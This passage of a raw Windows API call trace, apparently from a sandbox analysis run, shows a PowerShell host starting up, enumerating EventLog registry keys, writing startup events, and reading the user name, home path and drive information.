lpcchClass=0x0, 
lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.181] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x36c) returned 0x0 [0136.181] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.181] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x370) returned 0x0 [0136.182] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x374) returned 0x0 [0136.182] RegCloseKey (hKey=0x374) returned 0x0 [0136.182] RegCloseKey (hKey=0x350) returned 0x0 [0136.182] RegCloseKey (hKey=0x370) returned 0x0 [0136.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: 
phkResult=0xcd208*=0x370) returned 0x0 [0136.183] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 
| out: lpName="Key Management Service", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.183] CoTaskMemFree (pv=0x14d180) [0136.183] CoTaskMemFree (pv=0x0) [0136.183] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.183] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.184] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | 
out: lpName="Windows PowerShell", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.184] CoTaskMemFree (pv=0x14d180) [0136.184] CoTaskMemFree (pv=0x0) [0136.184] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x350) returned 0x0 [0136.184] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.184] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x374) returned 0x0 [0136.184] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.184] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x378) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x37c) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x380) returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x384) 
returned 0x0 [0136.185] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.185] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x5 [0136.193] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x388) returned 0x0 [0136.193] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x0) returned 0x2 [0136.194] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x38c) returned 0x0 [0136.194] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd268 | out: phkResult=0xcd268*=0x390) returned 0x0 [0136.194] RegCloseKey (hKey=0x390) returned 0x0 [0136.194] RegCloseKey (hKey=0x370) returned 0x0 [0136.194] RegCloseKey (hKey=0x38c) returned 0x0 [0136.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x38c) returned 0x0 [0136.199] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd14c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd148*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, 
dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.200] CoTaskMemFree (pv=0x0) [0136.200] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.200] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.200] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW 
(in: hKey=0x38c, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.201] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.201] CoTaskMemFree (pv=0x14d180) [0136.201] CoTaskMemFree (pv=0x0) [0136.201] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x370) returned 0x0 [0136.201] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x390) 
returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x394) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x398) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x39c) returned 0x0 [0136.202] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.202] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3a0) returned 0x0 [0136.203] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.203] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x5 [0136.204] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3a4) returned 0x0 [0136.205] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x0) returned 0x2 [0136.205] 
RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3a8) returned 0x0 [0136.205] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x3ac) returned 0x0 [0136.205] RegCloseKey (hKey=0x3ac) returned 0x0 [0136.205] RegCloseKey (hKey=0x38c) returned 0x0 [0136.205] RegCloseKey (hKey=0x3a8) returned 0x0 [0136.213] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008 [0136.217] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x365e390*="WSMan", lpRawData=0x365e100) returned 1 [0136.222] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.222] CoTaskMemFree (pv=0x10c990) [0136.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, 
lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.223] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.223] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.224] CoTaskMemFree (pv=0x1b825410) [0136.224] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.224] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.224] CoTaskMemFree (pv=0x14d180) [0136.224] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36638a8*="Alias", lpRawData=0x3663638) returned 1 [0136.225] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.225] CoTaskMemFree (pv=0x10c990) [0136.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.227] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.227] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.227] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.228] CoTaskMemFree (pv=0x1b825410) [0136.228] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.228] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.228] CoTaskMemFree (pv=0x14d180) [0136.228] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3668e80*="Environment", lpRawData=0x3668c10) returned 1 [0136.229] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.230] CoTaskMemFree (pv=0x10c990) [0136.230] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.230] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0136.230] CoTaskMemFree (pv=0x10c990) [0136.230] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.230] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="\\Users\\aDU0VK IWA5kLS") returned 0x15 [0136.230] CoTaskMemFree (pv=0x10c990) [0136.231] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.231] SetErrorMode (uMode=0x1) returned 0x1 [0136.231] 
GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd280 | out: lpFileInformation=0xcd280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.231] SetErrorMode (uMode=0x1) returned 0x1 [0136.233] GetLogicalDrives () returned 0x4 [0136.235] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.236] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.236] SetErrorMode (uMode=0x1) returned 0x1 [0136.237] CoTaskMemAlloc (cb=0x68) returned 0x1b80aac0 [0136.237] CoTaskMemAlloc (cb=0x68) returned 0x1b80ab30 [0136.237] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b80aac0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd250, lpMaximumComponentLength=0xcd24c, lpFileSystemFlags=0xcd248, lpFileSystemNameBuffer=0x1b80ab30, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd250*=0xfcdf19fa, lpMaximumComponentLength=0xcd24c*=0xff, lpFileSystemFlags=0xcd248*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0136.237] CoTaskMemFree (pv=0x1b80aac0) [0136.237] CoTaskMemFree (pv=0x1b80ab30) [0136.237] SetErrorMode (uMode=0x1) returned 0x1 [0136.237] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.238] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.238] SetErrorMode (uMode=0x1) returned 0x1 [0136.238] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd1f0 | out: 
